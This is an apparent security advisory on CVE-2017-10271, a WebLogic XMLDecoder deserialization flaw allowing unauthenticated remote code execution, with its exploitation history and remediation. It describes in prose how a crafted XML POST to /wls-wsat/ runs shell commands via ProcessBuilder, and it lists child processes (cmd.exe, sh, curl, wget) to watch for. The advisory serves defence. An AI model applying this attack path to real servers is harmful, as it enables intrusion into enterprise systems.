CVE-2017-10271

What Is Oracle WebLogic Server?

Oracle WebLogic Server is an enterprise Java EE application server used by large organizations for mission-critical business applications — financial services, telecommunications, government, healthcare. WebLogic servers often run with elevated privileges and have direct access to databases, internal networks, and sensitive business data. WebLogic's WS-AT (Web Services Atomic Transaction) component, exposed via the /wls-wsat/ URL path, was the entry point for CVE-2017-10271 and similar deserialization attacks. A compromised WebLogic server typically provides an attacker with access to sensitive application data, connected databases, and internal network segments.

Overview

CVE-2017-10271 is a deserialization vulnerability in Oracle WebLogic Server's WLS Security component that allows unauthenticated remote code execution. The vulnerability exploits XMLDecoder — Java's built-in XML-to-object deserializer — within WebLogic's WS-AT (Web Services Atomic Transaction) endpoint (/wls-wsat/). An attacker sends a crafted XML request to this endpoint; WebLogic deserializes the XML using XMLDecoder, which executes arbitrary Java code embedded in the XML payload. Patched in the Oracle October 2017 Critical Patch Update. Exploited immediately after patch release for Monero cryptomining and later for ransomware, CVE-2017-10271 became one of the most mass-exploited server-side vulnerabilities of 2017-2018.

Note: Oracle's CVSS score reflects only DoS (A:H, C:N/I:N), but real-world exploitation demonstrates full unauthenticated RCE. This is a known discrepancy in Oracle's CPU scoring for this vulnerability.

Affected Versions

Technical Details

Root Cause: XMLDecoder Deserialization in WS-AT Endpoint

CVE-2017-10271 is a deserialization vulnerability (CWE-502) in the WLS Security component of Oracle WebLogic Server. The WS-AT (Web Services Atomic Transaction) endpoint at /wls-wsat/CoordinatorPortType and /wls-wsat/CoordinatorPortType11 processes XML-formatted SOAP messages. WebLogic's handling of these messages uses Java's XMLDecoder class to deserialize XML content into Java objects.

XMLDecoder as a code execution primitive: XMLDecoder is Java's counterpart to XMLEncoder — it can reconstruct any serializable Java object from an XML representation. Critically, XMLDecoder can instantiate objects and call their methods during deserialization, including calling ProcessBuilder.start() or Runtime.exec() with attacker-controlled arguments. This makes any code path that deserializes attacker-controlled data via XMLDecoder equivalent to arbitrary code execution.

Attack mechanics:

1. Attacker sends an HTTP POST to /wls-wsat/CoordinatorPortType with a crafted XML body
2. The XML body contains <object class="java.lang.ProcessBuilder"> with a shell command
3. WebLogic deserializes the XML using XMLDecoder, which instantiates the ProcessBuilder and calls .start()
4. The system command executes as the WebLogic server process user

Relationship to CVE-2017-3506: CVE-2017-3506 (April 2017 CPU) patched a similar XMLDecoder issue in WebLogic, but the fix was incomplete — CVE-2017-10271 was a bypass of that fix, exploiting a different endpoint or bypassing the blocklist added in the earlier patch.

Attack Characteristics

Discovery

CVE-2017-10271 was discovered and reported to Oracle; it was patched in the October 2017 CPU. Proof-of-concept exploit code was published within days of the patch, triggering immediate mass exploitation.

Exploitation Context

• Immediate mass exploitation: Within days of the October 2017 CPU, attackers began mass-scanning for exposed /wls-wsat/ endpoints and deploying Monero cryptocurrency mining software; organizations that did not apply the CPU promptly were compromised at scale
• Cryptomining wave: The 2017-2018 cryptomining epidemic targeted WebLogic heavily — the combination of server-side Java execution, persistent processes, and powerful hardware made WebLogic servers highly attractive for mining operations; CVE-2017-10271 was the primary initial access vector
• Ransomware deployment: Criminal groups later incorporated CVE-2017-10271 into ransomware campaigns targeting enterprise WebLogic deployments, particularly attacking financial institutions and companies with internet-facing WebLogic instances; CISA's ransomwareUse:true reflects these later ransomware campaigns
• Chinese APT exploitation: Nation-state actors attributed to China used CVE-2017-10271 for targeted intrusions against organizations running WebLogic for enterprise applications
• Persistent exploitation years later: WebLogic deserialization vulnerabilities have a long exploitation tail — organizations running old WebLogic versions (including on internal networks exposed via lateral movement) remained targets years after the patch
• CISA KEV (2022): Added February 2022 confirming ongoing active exploitation

Remediation

1. Apply Oracle October 2017 Critical Patch Update — update all WebLogic Server instances to patched versions. Oracle CPUs are quarterly; apply the next available CPU if running a version patched in a later release.

2. Block or remove the WLS-WSAT endpoint — if the Web Services Atomic Transaction component is not required, delete or disable it to eliminate the attack surface:

   • Remove /wls-wsat from the WebLogic deployment
   • Or block access to /wls-wsat/* at the web server/firewall level

3. Do not expose WebLogic admin ports to the internet — WebLogic's administration port (default 7001, 7002 for SSL) and managed server ports should never be directly internet-facing; place WebLogic behind a WAF or reverse proxy.

4. Monitor for anomalous process creation — alert when the WebLogic process spawns unexpected child processes (cmd.exe, sh, curl, wget); this indicates successful exploitation.

5. Apply the principle of least privilege to WebLogic service accounts — run WebLogic as a non-root / non-SYSTEM service account with minimal OS permissions to limit damage from exploitation.